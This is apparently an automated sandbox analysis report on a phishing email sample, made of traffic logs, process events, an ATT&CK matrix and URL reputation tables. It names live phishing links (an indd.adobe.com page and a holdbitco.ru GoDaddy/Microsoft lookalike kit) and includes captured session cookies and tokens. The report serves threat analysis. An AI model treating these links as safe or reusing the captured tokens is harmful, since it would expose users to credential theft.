Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_email_958962caa7cf6b75cd412e9e3b687b22.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/godaddy-logo.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /adfs/portal/logo/logo.png HTTP/1.1Host: adfs.heart.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49824 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_6492_816486134Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess token adjusted: SecurityJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\EXTERNAL DESERT FORREST NURSERY LLC.msg
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "514C220F-94D1-4724-9DCA-610A81398BDA" "87AE37A8-E611-4D04-A8FC-53B3877F621D" "4076" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1952,i,18191314582763280315,6070070220069831171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "514C220F-94D1-4724-9DCA-610A81398BDA" "87AE37A8-E611-4D04-A8FC-53B3877F621D" "4076" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1952,i,18191314582763280315,6070070220069831171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20231025T1827070176-4076.etlJump to behavior
Source: classification engineClassification label: mal52.phis.winMSG@21/80@54/18
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe c:\program files (x86)\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe" "514c220f-94d1-4724-9dca-610a81398bda" "87ae37a8-e611-4d04-a8fc-53b3877f621d" "4076" "c:\program files (x86)\microsoft office\root\office16\outlook.exe" "wordcombinedfloatielreonline.onnx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe c:\program files (x86)\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe" "514c220f-94d1-4724-9dca-610a81398bda" "87ae37a8-e611-4d04-a8fc-53b3877f621d" "4076" "c:\program files (x86)\microsoft office\root\office16\outlook.exe" "wordcombinedfloatielreonline.onnxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation BiasJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter
1
Registry Run Keys / Startup Folder
1
Process Injection
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager13
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1332045 Sample: EXTERNAL    DESERT FORREST ... Startdate: 25/10/2023 Architecture: WINDOWS Score: 52 18 part-0012.t-0009.fb-t-msedge.net 2->18 20 dual.part-0012.t-0009.t-msedge.net 2->20 22 4 other IPs or domains 2->22 36 Antivirus detection for URL or domain 2->36 38 Phishing site or detected (based on various OCR indicators) 2->38 8 OUTLOOK.EXE 49 114 2->8         started        signatures3 process4 process5 10 chrome.exe 9 8->10         started        13 ai.exe 8->13         started        dnsIp6 24 192.168.2.16, 138, 443, 49480 unknown unknown 10->24 26 192.168.2.30 unknown unknown 10->26 28 239.255.255.250 unknown Reserved 10->28 15 chrome.exe 10->15         started        process7 dnsIp8 30 172.253.122.102, 443, 49836 GOOGLEUS United States 15->30 32 www.google.com 172.253.122.105, 443, 49757, 49828 GOOGLEUS United States 15->32 34 24 other IPs or domains 15->34

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://cdn.entity.0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://www.internalfb.com/intern/invariant/0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/js/pages.min.js?cb=16982512581650%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/validatecaptcha0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/officelogo.png0%Avira URL Cloudsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/key.png0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/js/pages-head-web.min.js?cb=16982512581650%Avira URL Cloudsafe
http://hammerjs.github.io/0%URL Reputationsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-vf.woff20%Avira URL Cloudsafe
https://d.docs.live.net0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/godaddy-microsoftlogo.png0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-bold.woff20%Avira URL Cloudsafe
https://wus2.pagecontentsync.0%URL Reputationsafe
https://cortana.ai/api0%URL Reputationsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/godaddy-logo.png0%Avira URL Cloudsafe
